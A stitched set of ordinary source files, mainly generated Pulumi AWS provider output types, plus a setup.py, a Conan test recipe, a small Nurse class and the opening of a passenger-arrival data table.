    def neptune(self) -> Optional[str]:
        return pulumi.get(self, "neptune")
    @property
    @pulumi.getter
    def networkfirewall(self) -> Optional[str]:
        return pulumi.get(self, "networkfirewall")
    @property
    @pulumi.getter
    def networkmanager(self) -> Optional[str]:
        return pulumi.get(self, "networkmanager")
    @property
    @pulumi.getter
    def opsworks(self) -> Optional[str]:
        return pulumi.get(self, "opsworks")
    @property
    @pulumi.getter
    def organizations(self) -> Optional[str]:
        return pulumi.get(self, "organizations")
    @property
    @pulumi.getter
    def outposts(self) -> Optional[str]:
        return pulumi.get(self, "outposts")
    @property
    @pulumi.getter
    def personalize(self) -> Optional[str]:
        return pulumi.get(self, "personalize")
    @property
    @pulumi.getter
    def pinpoint(self) -> Optional[str]:
        return pulumi.get(self, "pinpoint")
    @property
    @pulumi.getter
    def pricing(self) -> Optional[str]:
        return pulumi.get(self, "pricing")
    @property
    @pulumi.getter
    def qldb(self) -> Optional[str]:
        return pulumi.get(self, "qldb")
    @property
    @pulumi.getter
    def quicksight(self) -> Optional[str]:
        return pulumi.get(self, "quicksight")
    @property
    @pulumi.getter
    def ram(self) -> Optional[str]:
        return pulumi.get(self, "ram")
    @property
    @pulumi.getter
    def rds(self) -> Optional[str]:
        return pulumi.get(self, "rds")
    @property
    @pulumi.getter
    def redshift(self) -> Optional[str]:
        return pulumi.get(self, "redshift")
    @property
    @pulumi.getter
    def resourcegroups(self) -> Optional[str]:
        return pulumi.get(self, "resourcegroups")
    @property
    @pulumi.getter
    def resourcegroupstaggingapi(self) -> Optional[str]:
        return pulumi.get(self, "resourcegroupstaggingapi")
    @property
    @pulumi.getter
    def route53(self) -> Optional[str]:
        return pulumi.get(self, "route53")
    @property
    @pulumi.getter
    def route53domains(self) -> Optional[str]:
        return pulumi.get(self, "route53domains")
    @property
    @pulumi.getter
    def route53resolver(self) -> Optional[str]:
        return pulumi.get(self, "route53resolver")
    @property
    @pulumi.getter
    def s3(self) -> Optional[str]:
        return pulumi.get(self, "s3")
    @property
    @pulumi.getter
    def s3control(self) -> Optional[str]:
        return pulumi.get(self, "s3control")
    @property
    @pulumi.getter
    def s3outposts(self) -> Optional[str]:
        return pulumi.get(self, "s3outposts")
    @property
    @pulumi.getter
    def sagemaker(self) -> Optional[str]:
        return pulumi.get(self, "sagemaker")
    @property
    @pulumi.getter
    def sdb(self) -> Optional[str]:
        return pulumi.get(self, "sdb")
    @property
    @pulumi.getter
    def secretsmanager(self) -> Optional[str]:
        return pulumi.get(self, "secretsmanager")
    @property
    @pulumi.getter
    def securityhub(self) -> Optional[str]:
        return pulumi.get(self, "securityhub")
    @property
    @pulumi.getter
    def serverlessrepo(self) -> Optional[str]:
        return pulumi.get(self, "serverlessrepo")
    @property
    @pulumi.getter
    def servicecatalog(self) -> Optional[str]:
        return pulumi.get(self, "servicecatalog")
    @property
    @pulumi.getter
    def servicediscovery(self) -> Optional[str]:
        return pulumi.get(self, "servicediscovery")
    @property
    @pulumi.getter
    def servicequotas(self) -> Optional[str]:
        return pulumi.get(self, "servicequotas")
    @property
    @pulumi.getter
    def ses(self) -> Optional[str]:
        return pulumi.get(self, "ses")
    @property
    @pulumi.getter
    def shield(self) -> Optional[str]:
        return pulumi.get(self, "shield")
    @property
    @pulumi.getter
    def signer(self) -> Optional[str]:
        return pulumi.get(self, "signer")
    @property
    @pulumi.getter
    def sns(self) -> Optional[str]:
        return pulumi.get(self, "sns")
    @property
    @pulumi.getter
    def sqs(self) -> Optional[str]:
        return pulumi.get(self, "sqs")
    @property
    @pulumi.getter
    def ssm(self) -> Optional[str]:
        return pulumi.get(self, "ssm")
    @property
    @pulumi.getter
    def ssoadmin(self) -> Optional[str]:
        return pulumi.get(self, "ssoadmin")
    @property
    @pulumi.getter
    def stepfunctions(self) -> Optional[str]:
        return pulumi.get(self, "stepfunctions")
    @property
    @pulumi.getter
    def storagegateway(self) -> Optional[str]:
        return pulumi.get(self, "storagegateway")
    @property
    @pulumi.getter
    def sts(self) -> Optional[str]:
        return pulumi.get(self, "sts")
    @property
    @pulumi.getter
    def swf(self) -> Optional[str]:
        return pulumi.get(self, "swf")
    @property
    @pulumi.getter
    def synthetics(self) -> Optional[str]:
        return pulumi.get(self, "synthetics")
    @property
    @pulumi.getter
    def timestreamwrite(self) -> Optional[str]:
        return pulumi.get(self, "timestreamwrite")
    @property
    @pulumi.getter
    def transfer(self) -> Optional[str]:
        return pulumi.get(self, "transfer")
    @property
    @pulumi.getter
    def waf(self) -> Optional[str]:
        return pulumi.get(self, "waf")
    @property
    @pulumi.getter
    def wafregional(self) -> Optional[str]:
        return pulumi.get(self, "wafregional")
    @property
    @pulumi.getter
    def wafv2(self) -> Optional[str]:
        return pulumi.get(self, "wafv2")
    @property
    @pulumi.getter
    def worklink(self) -> Optional[str]:
        return pulumi.get(self, "worklink")
    @property
    @pulumi.getter
    def workmail(self) -> Optional[str]:
        return pulumi.get(self, "workmail")
    @property
    @pulumi.getter
    def workspaces(self) -> Optional[str]:
        return pulumi.get(self, "workspaces")
    @property
    @pulumi.getter
    def xray(self) -> Optional[str]:
        return pulumi.get(self, "xray")

    def _translate_property(self, prop):
        # Map a camelCase wire name to its snake_case attribute name,
        # falling back to the original name when no mapping exists.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ProviderIgnoreTags(dict):
    """Ignore-tags configuration block for the AWS provider."""

    def __init__(__self__, *,
                 key_prefixes: Optional[Sequence[str]] = None,
                 keys: Optional[Sequence[str]] = None):
        # Record only the filters the caller actually supplied.
        for attr, value in (("key_prefixes", key_prefixes), ("keys", keys)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="keyPrefixes")
    def key_prefixes(self) -> Optional[Sequence[str]]:
        """The configured key prefixes, if any."""
        return pulumi.get(self, "key_prefixes")

    @property
    @pulumi.getter
    def keys(self) -> Optional[Sequence[str]]:
        """The configured keys, if any."""
        return pulumi.get(self, "keys")

    def _translate_property(self, prop):
        # Map a camelCase wire name to its snake_case attribute name,
        # falling back to the original name when no mapping exists.
        translated = _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop)
        return translated or prop
@pulumi.output_type
class GetAmiBlockDeviceMappingResult(dict):
    def __init__(__self__, *,
                 device_name: str,
                 ebs: Mapping[str, str],
                 no_device: str,
                 virtual_name: str):
        """
        :param str device_name: The physical name of the device.
        :param Mapping[str, str] ebs: Map containing EBS information, if the device is EBS based. Unlike most object attributes, these are accessed directly (e.g. `ebs.volume_size` or `ebs["volume_size"]`) rather than accessed through the first element of a list (e.g. `ebs[0].volume_size`).
        :param str no_device: Suppresses the specified device included in the block device mapping of the AMI.
        :param str virtual_name: The virtual device name (for instance stores).
        """
        # All four attributes are required, so store them uniformly.
        for attr, value in (
                ("device_name", device_name),
                ("ebs", ebs),
                ("no_device", no_device),
                ("virtual_name", virtual_name)):
            pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="deviceName")
    def device_name(self) -> str:
        """
        The physical name of the device.
        """
        return pulumi.get(self, "device_name")

    @property
    @pulumi.getter
    def ebs(self) -> Mapping[str, str]:
        """
        Map containing EBS information, if the device is EBS based. Unlike most object attributes, these are accessed directly (e.g. `ebs.volume_size` or `ebs["volume_size"]`) rather than accessed through the first element of a list (e.g. `ebs[0].volume_size`).
        """
        return pulumi.get(self, "ebs")

    @property
    @pulumi.getter(name="noDevice")
    def no_device(self) -> str:
        """
        Suppresses the specified device included in the block device mapping of the AMI.
        """
        return pulumi.get(self, "no_device")

    @property
    @pulumi.getter(name="virtualName")
    def virtual_name(self) -> str:
        """
        The virtual device name (for instance stores).
        """
        return pulumi.get(self, "virtual_name")
@pulumi.output_type
class GetAmiFilterResult(dict):
    """Name/values filter pair used by AMI lookups."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        """
        :param str name: The name of the AMI that was provided during image creation.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """The name of the AMI that was provided during image creation."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Stored filter values."""
        return pulumi.get(self, "values")
@pulumi.output_type
class GetAmiIdsFilterResult(dict):
    """Name/values filter pair used by AMI-ID lookups."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """Stored filter name."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Stored filter values."""
        return pulumi.get(self, "values")
@pulumi.output_type
class GetAmiProductCodeResult(dict):
    """Product-code id/type pair from an AMI lookup result."""

    def __init__(__self__, *,
                 product_code_id: str,
                 product_code_type: str):
        pulumi.set(__self__, "product_code_id", product_code_id)
        pulumi.set(__self__, "product_code_type", product_code_type)

    @property
    @pulumi.getter(name="productCodeId")
    def product_code_id(self) -> str:
        """Stored product code id."""
        return pulumi.get(self, "product_code_id")

    @property
    @pulumi.getter(name="productCodeType")
    def product_code_type(self) -> str:
        """Stored product code type."""
        return pulumi.get(self, "product_code_type")
@pulumi.output_type
class GetAutoscalingGroupsFilterResult(dict):
    """Name/values filter pair used when querying autoscaling groups."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        """
        :param str name: The name of the filter. The valid values are: `auto-scaling-group`, `key`, `value`, and `propagate-at-launch`.
        :param Sequence[str] values: The value of the filter.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """The name of the filter. The valid values are: `auto-scaling-group`,
        `key`, `value`, and `propagate-at-launch`."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """The value of the filter."""
        return pulumi.get(self, "values")
@pulumi.output_type
class GetAvailabilityZoneFilterResult(dict):
    """Name/values filter pair for a single availability-zone lookup."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        """
        :param str name: The name of the filter field. Valid values can be found in the [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html).
        :param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """The name of the filter field. Valid values can be found in the
        [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html)."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Set of values accepted for the filter field; any match selects a result."""
        return pulumi.get(self, "values")
@pulumi.output_type
class GetAvailabilityZonesFilterResult(dict):
    """Name/values filter pair for an availability-zones list lookup."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        """
        :param str name: The name of the filter field. Valid values can be found in the [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html).
        :param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """The name of the filter field. Valid values can be found in the
        [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html)."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Set of values accepted for the filter field; any match selects a result."""
        return pulumi.get(self, "values")
@pulumi.output_type
class GetElasticIpFilterResult(dict):
    """Name/values filter pair used by Elastic IP lookups."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """Stored filter name."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Stored filter values."""
        return pulumi.get(self, "values")
@pulumi.output_type
class GetPrefixListFilterResult(dict):
    """Name/values filter pair for a prefix-list lookup."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        """
        :param str name: The name of the filter field. Valid values can be found in the [EC2 DescribePrefixLists API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribePrefixLists.html).
        :param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """The name of the filter field. Valid values can be found in the
        [EC2 DescribePrefixLists API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribePrefixLists.html)."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Set of values accepted for the filter field; any match selects a result."""
        return pulumi.get(self, "values")
@pulumi.output_type
class GetRegionsFilterResult(dict):
    """Name/values filter pair for a regions lookup."""

    def __init__(__self__, *,
                 name: str,
                 values: Sequence[str]):
        """
        :param str name: The name of the filter field. Valid values can be found in the [describe-regions AWS CLI Reference][1].
        :param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def name(self) -> str:
        """The name of the filter field. Valid values can be found in the
        [describe-regions AWS CLI Reference][1]."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Set of values accepted for the filter field; any match selects a result."""
        return pulumi.get(self, "values")
| 33.263542 | 291 | 0.601716 |
7762969e468e630cab9912c9e39aa8105f563ce4 | 327 | py | Python | setup.py | zhangalbert/a | 466b10ded2c85e7fceea60a95f081cb0b11b5222 | [
"Apache-2.0"
] | null | null | null | setup.py | zhangalbert/a | 466b10ded2c85e7fceea60a95f081cb0b11b5222 | [
"Apache-2.0"
] | null | null | null | setup.py | zhangalbert/a | 466b10ded2c85e7fceea60a95f081cb0b11b5222 | [
"Apache-2.0"
] | null | null | null | from distutils.core import setup
# Packaging metadata for the "a" distribution (distutils-based build script).
setup(name='a',
      version='0.1.0',
      packages=['a', 'a.security'],
      install_requires=['WebOb>=1.6.1'],
      author = "albert.zhang",
      author_email = "longbao.zhang@gmail.com",
      description = "This is a very light web framework",
      license = "Apache License 2.0",
      )
| 27.25 | 57 | 0.611621 |
89b0e07ae49fe144037df04696d84833f2fcc728 | 549 | py | Python | recipes/jpeg-compressor/all/test_package/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 562 | 2019-09-04T12:23:43.000Z | 2022-03-29T16:41:43.000Z | recipes/jpeg-compressor/all/test_package/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 9,799 | 2019-09-04T12:02:11.000Z | 2022-03-31T23:55:45.000Z | recipes/jpeg-compressor/all/test_package/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 1,126 | 2019-09-04T11:57:46.000Z | 2022-03-31T16:43:38.000Z | from conans import ConanFile, CMake, tools
import os
class TestPackageConan(ConanFile):
    """Conan test package: builds the bundled CMake project and runs it on a sample image."""

    settings = "os", "compiler", "build_type", "arch"
    generators = "cmake"

    def build(self):
        """Configure and compile the CMake-based test executable."""
        builder = CMake(self)
        builder.configure()
        builder.build()

    def test(self):
        """Run the built executable against the sample JPEG (skipped when cross-building)."""
        if not tools.cross_building(self.settings):
            image = os.path.join(self.source_folder, "testimg.jpg")
            executable = os.path.join("bin", "test_package")
            self.run("{} {}".format(executable, image), run_environment=True)
ba8efe4d5c94751efa02852fca36d1a0d96166a6 | 417 | py | Python | Assignment 2/main_lib/Nurse.py | toileto/OOIS_PCOM7E | 25e3c34d985e5cbc5aa3d69efba5370a23edf0a1 | [
"MIT"
] | null | null | null | Assignment 2/main_lib/Nurse.py | toileto/OOIS_PCOM7E | 25e3c34d985e5cbc5aa3d69efba5370a23edf0a1 | [
"MIT"
] | null | null | null | Assignment 2/main_lib/Nurse.py | toileto/OOIS_PCOM7E | 25e3c34d985e5cbc5aa3d69efba5370a23edf0a1 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from main_lib.HealthcareProfessional import HealthcareProfessional
class Nurse(HealthcareProfessional):
    """A nurse; delegates all initialisation to HealthcareProfessional."""

    def __init__(self, name, appointment_schedule):
        # No nurse-specific state: forward both arguments to the parent
        # class initialiser unchanged.
        super(Nurse, self).__init__(name, appointment_schedule)
| 29.785714 | 66 | 0.719424 |
5ea7d6b89558ef89f70aa5c7f56bb0f0498d44e9 | 258,510 | py | Python | instances/passenger_demand/pas-20210422-1717-int4e-1/17.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210422-1717-int4e-1/17.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210422-1717-int4e-1/17.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null |
"""
PASSENGERS
"""
numPassengers = 7640
passenger_arriving = (
(0, 3, 4, 1, 1, 1, 0, 1, 5, 0, 0, 1, 0, 1, 5, 2, 3, 3, 1, 2, 1, 1, 1, 0, 0, 0), # 0
(3, 3, 2, 3, 0, 0, 0, 1, 1, 1, 0, 0, 0, 3, 3, 1, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0), # 1
(2, 3, 4, 3, 3, 0, 2, 0, 1, 0, 0, 0, 0, 2, 3, 2, 0, 2, 1, 0, 3, 0, 1, 0, 1, 0), # 2
(2, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 2, 1, 0, 0, 0, 2, 1, 0, 0, 0), # 3
(1, 3, 0, 3, 2, 0, 0, 2, 1, 0, 0, 1, 0, 0, 3, 0, 2, 1, 3, 0, 1, 1, 3, 0, 0, 0), # 4
(4, 0, 1, 3, 3, 0, 1, 2, 3, 0, 1, 0, 0, 1, 4, 2, 5, 1, 1, 0, 1, 1, 1, 0, 0, 0), # 5
(4, 3, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 0, 3, 2, 2, 2, 4, 0, 6, 0, 0, 1, 0, 1, 0), # 6
(2, 4, 4, 1, 2, 2, 0, 0, 1, 1, 1, 0, 0, 4, 0, 1, 1, 4, 1, 2, 0, 2, 1, 2, 0, 0), # 7
(2, 4, 4, 0, 0, 0, 0, 0, 1, 2, 1, 0, 0, 3, 4, 2, 0, 3, 1, 0, 0, 1, 3, 0, 0, 0), # 8
(4, 2, 2, 2, 2, 0, 0, 2, 1, 1, 1, 0, 0, 1, 3, 4, 3, 1, 5, 2, 1, 2, 3, 1, 0, 0), # 9
(2, 8, 4, 2, 1, 4, 0, 2, 1, 0, 0, 1, 0, 2, 3, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0), # 10
(5, 4, 3, 2, 4, 0, 0, 0, 2, 0, 0, 0, 0, 5, 4, 6, 2, 4, 2, 2, 2, 1, 0, 0, 1, 0), # 11
(5, 1, 1, 5, 2, 0, 2, 3, 3, 1, 1, 0, 0, 4, 4, 6, 2, 6, 5, 1, 1, 1, 1, 0, 0, 0), # 12
(5, 5, 3, 3, 2, 2, 2, 0, 1, 0, 0, 0, 0, 2, 2, 3, 1, 0, 2, 0, 0, 0, 1, 0, 2, 0), # 13
(2, 3, 6, 1, 4, 1, 2, 3, 2, 0, 0, 0, 0, 5, 2, 3, 5, 2, 1, 2, 1, 1, 1, 1, 0, 0), # 14
(5, 3, 3, 1, 2, 1, 1, 4, 2, 0, 1, 0, 0, 5, 4, 4, 0, 0, 1, 1, 2, 1, 2, 2, 2, 0), # 15
(6, 3, 3, 5, 1, 3, 2, 2, 2, 1, 0, 0, 0, 2, 3, 1, 3, 3, 2, 2, 0, 2, 1, 2, 0, 0), # 16
(1, 3, 4, 5, 6, 1, 2, 1, 1, 0, 1, 0, 0, 2, 7, 2, 0, 4, 0, 5, 0, 2, 2, 1, 1, 0), # 17
(2, 4, 5, 5, 1, 0, 1, 1, 0, 3, 0, 0, 0, 7, 3, 4, 2, 2, 1, 1, 0, 2, 0, 0, 0, 0), # 18
(2, 4, 5, 1, 2, 1, 0, 3, 3, 0, 0, 1, 0, 2, 2, 6, 3, 3, 1, 0, 0, 2, 0, 1, 0, 0), # 19
(5, 3, 5, 4, 2, 1, 4, 1, 0, 0, 0, 0, 0, 3, 2, 2, 0, 3, 2, 2, 0, 1, 2, 0, 1, 0), # 20
(4, 5, 0, 3, 3, 0, 1, 2, 0, 3, 1, 0, 0, 2, 5, 2, 2, 3, 6, 1, 1, 2, 1, 2, 1, 0), # 21
(2, 1, 5, 4, 6, 1, 1, 2, 1, 3, 1, 2, 0, 2, 5, 6, 6, 2, 0, 1, 1, 2, 0, 1, 0, 0), # 22
(2, 6, 2, 0, 4, 0, 3, 3, 1, 2, 1, 0, 0, 2, 1, 1, 3, 3, 2, 1, 2, 3, 1, 0, 3, 0), # 23
(2, 4, 2, 3, 3, 2, 1, 2, 0, 1, 1, 0, 0, 3, 3, 0, 5, 5, 0, 3, 0, 1, 1, 3, 0, 0), # 24
(7, 4, 3, 0, 1, 3, 0, 1, 2, 0, 0, 0, 0, 9, 7, 4, 1, 5, 3, 2, 1, 3, 0, 2, 0, 0), # 25
(7, 4, 6, 3, 6, 3, 3, 0, 1, 1, 2, 0, 0, 3, 6, 2, 5, 5, 4, 1, 1, 2, 1, 2, 2, 0), # 26
(3, 6, 3, 1, 2, 4, 1, 1, 5, 0, 1, 0, 0, 7, 4, 3, 1, 4, 1, 0, 0, 2, 2, 0, 0, 0), # 27
(7, 2, 3, 1, 1, 0, 4, 2, 2, 1, 1, 0, 0, 7, 4, 1, 2, 2, 1, 3, 0, 4, 0, 0, 1, 0), # 28
(6, 5, 3, 5, 2, 1, 1, 1, 0, 1, 1, 0, 0, 3, 5, 5, 1, 2, 3, 1, 1, 4, 1, 1, 0, 0), # 29
(5, 4, 4, 4, 6, 2, 4, 2, 2, 0, 1, 0, 0, 5, 3, 3, 3, 3, 0, 6, 2, 1, 0, 0, 0, 0), # 30
(3, 5, 6, 4, 6, 2, 1, 1, 0, 0, 1, 0, 0, 2, 4, 3, 0, 4, 3, 1, 3, 2, 1, 0, 1, 0), # 31
(2, 8, 3, 0, 7, 3, 1, 2, 2, 1, 1, 0, 0, 4, 2, 2, 5, 3, 1, 1, 0, 1, 0, 2, 0, 0), # 32
(1, 2, 2, 3, 4, 1, 4, 2, 4, 3, 3, 0, 0, 1, 6, 7, 2, 2, 3, 1, 0, 2, 2, 1, 0, 0), # 33
(5, 2, 3, 2, 4, 1, 2, 1, 2, 0, 0, 1, 0, 6, 3, 3, 2, 3, 4, 2, 2, 3, 0, 0, 0, 0), # 34
(3, 3, 5, 2, 6, 1, 2, 1, 1, 0, 1, 1, 0, 2, 3, 2, 2, 3, 3, 1, 1, 1, 1, 0, 2, 0), # 35
(5, 5, 5, 4, 4, 2, 1, 4, 2, 0, 0, 0, 0, 4, 3, 2, 2, 3, 1, 3, 0, 1, 0, 0, 0, 0), # 36
(6, 5, 4, 3, 1, 3, 1, 2, 3, 0, 1, 0, 0, 2, 3, 3, 2, 0, 3, 1, 1, 3, 1, 0, 1, 0), # 37
(2, 5, 4, 5, 0, 3, 2, 0, 0, 4, 0, 0, 0, 6, 5, 2, 2, 1, 2, 1, 0, 4, 1, 1, 0, 0), # 38
(2, 4, 3, 5, 2, 1, 0, 1, 0, 1, 1, 1, 0, 2, 3, 0, 4, 1, 2, 1, 1, 1, 3, 0, 0, 0), # 39
(5, 2, 6, 5, 3, 1, 2, 1, 3, 0, 0, 0, 0, 7, 5, 4, 0, 4, 0, 1, 2, 1, 0, 3, 2, 0), # 40
(1, 4, 4, 4, 3, 3, 4, 0, 1, 1, 0, 0, 0, 5, 3, 1, 2, 3, 1, 2, 2, 2, 3, 1, 1, 0), # 41
(3, 1, 5, 5, 4, 1, 4, 2, 3, 1, 0, 0, 0, 5, 2, 4, 2, 0, 3, 2, 0, 2, 2, 0, 0, 0), # 42
(2, 2, 3, 5, 1, 3, 3, 1, 0, 0, 1, 1, 0, 2, 2, 2, 5, 5, 3, 1, 0, 1, 1, 1, 0, 0), # 43
(4, 3, 2, 6, 8, 2, 4, 0, 3, 2, 0, 0, 0, 6, 4, 2, 4, 4, 0, 2, 0, 1, 2, 1, 0, 0), # 44
(0, 10, 1, 3, 2, 0, 1, 0, 0, 1, 1, 0, 0, 4, 5, 1, 1, 3, 3, 0, 0, 1, 1, 0, 0, 0), # 45
(5, 1, 4, 3, 3, 1, 0, 1, 2, 1, 0, 0, 0, 3, 0, 4, 1, 2, 2, 1, 0, 6, 0, 1, 0, 0), # 46
(3, 3, 3, 5, 2, 0, 1, 4, 2, 1, 0, 0, 0, 2, 3, 5, 3, 4, 4, 2, 0, 3, 0, 0, 0, 0), # 47
(7, 2, 5, 1, 2, 1, 2, 1, 1, 3, 0, 0, 0, 5, 5, 1, 2, 4, 5, 1, 1, 2, 3, 1, 0, 0), # 48
(5, 2, 5, 1, 2, 2, 2, 2, 3, 2, 0, 0, 0, 4, 5, 0, 1, 1, 3, 2, 0, 2, 2, 1, 0, 0), # 49
(2, 5, 2, 6, 4, 3, 0, 0, 2, 1, 1, 0, 0, 6, 0, 3, 2, 1, 2, 2, 0, 2, 1, 1, 0, 0), # 50
(4, 2, 6, 3, 1, 1, 2, 0, 3, 0, 0, 1, 0, 1, 1, 2, 4, 6, 1, 0, 0, 1, 2, 0, 0, 0), # 51
(4, 5, 6, 4, 4, 0, 0, 2, 2, 2, 0, 0, 0, 2, 2, 1, 3, 2, 2, 3, 1, 1, 3, 2, 0, 0), # 52
(5, 3, 2, 2, 1, 1, 4, 2, 3, 0, 0, 0, 0, 10, 6, 0, 1, 1, 0, 0, 0, 4, 2, 1, 1, 0), # 53
(2, 6, 3, 5, 4, 3, 0, 2, 0, 0, 0, 0, 0, 3, 7, 4, 1, 2, 3, 1, 0, 3, 1, 1, 0, 0), # 54
(4, 8, 0, 2, 5, 0, 3, 3, 4, 0, 1, 0, 0, 2, 4, 4, 1, 2, 0, 0, 1, 2, 1, 0, 0, 0), # 55
(5, 4, 5, 3, 4, 0, 0, 1, 1, 0, 0, 1, 0, 2, 2, 3, 2, 3, 1, 2, 1, 3, 0, 1, 0, 0), # 56
(4, 3, 5, 4, 1, 2, 0, 2, 0, 0, 0, 0, 0, 6, 2, 4, 3, 3, 4, 5, 1, 1, 0, 0, 0, 0), # 57
(2, 6, 4, 6, 3, 2, 0, 1, 5, 0, 1, 1, 0, 2, 4, 1, 1, 5, 1, 0, 2, 2, 2, 0, 0, 0), # 58
(2, 2, 1, 1, 4, 0, 4, 1, 3, 1, 1, 0, 0, 6, 6, 1, 2, 4, 3, 1, 0, 0, 2, 1, 1, 0), # 59
(4, 1, 6, 2, 3, 0, 0, 0, 3, 0, 1, 0, 0, 4, 2, 3, 2, 1, 2, 1, 0, 1, 3, 2, 0, 0), # 60
(7, 3, 2, 5, 4, 1, 2, 0, 1, 1, 0, 0, 0, 3, 2, 3, 7, 2, 1, 0, 0, 1, 2, 0, 0, 0), # 61
(5, 2, 2, 3, 2, 0, 0, 1, 2, 2, 2, 0, 0, 4, 7, 1, 5, 5, 3, 0, 1, 3, 1, 2, 1, 0), # 62
(5, 3, 1, 5, 2, 2, 0, 1, 1, 0, 2, 0, 0, 6, 5, 6, 5, 2, 1, 0, 1, 2, 1, 0, 0, 0), # 63
(1, 3, 4, 2, 3, 0, 4, 1, 0, 0, 0, 1, 0, 4, 6, 0, 2, 1, 0, 3, 2, 2, 1, 0, 0, 0), # 64
(7, 7, 4, 3, 6, 2, 0, 2, 0, 0, 0, 0, 0, 3, 4, 5, 0, 4, 3, 1, 1, 1, 1, 0, 0, 0), # 65
(3, 6, 0, 2, 3, 1, 2, 2, 2, 0, 0, 1, 0, 11, 3, 3, 1, 6, 2, 2, 0, 1, 2, 1, 0, 0), # 66
(4, 1, 3, 2, 2, 3, 2, 1, 2, 2, 1, 0, 0, 5, 1, 3, 5, 3, 0, 1, 2, 2, 1, 0, 1, 0), # 67
(6, 5, 2, 3, 4, 5, 1, 4, 2, 0, 1, 0, 0, 3, 4, 1, 2, 2, 1, 2, 1, 2, 2, 0, 0, 0), # 68
(3, 1, 7, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 2, 5, 2, 5, 2, 0, 3, 1, 3, 2, 1, 0, 0), # 69
(2, 6, 3, 3, 5, 1, 1, 2, 1, 2, 0, 0, 0, 3, 8, 1, 3, 3, 0, 3, 0, 2, 1, 0, 0, 0), # 70
(0, 3, 4, 2, 5, 2, 1, 0, 1, 0, 0, 0, 0, 4, 6, 2, 6, 8, 1, 1, 1, 1, 0, 0, 0, 0), # 71
(1, 4, 3, 3, 0, 1, 0, 1, 3, 0, 1, 0, 0, 5, 7, 4, 1, 3, 1, 0, 0, 3, 3, 1, 0, 0), # 72
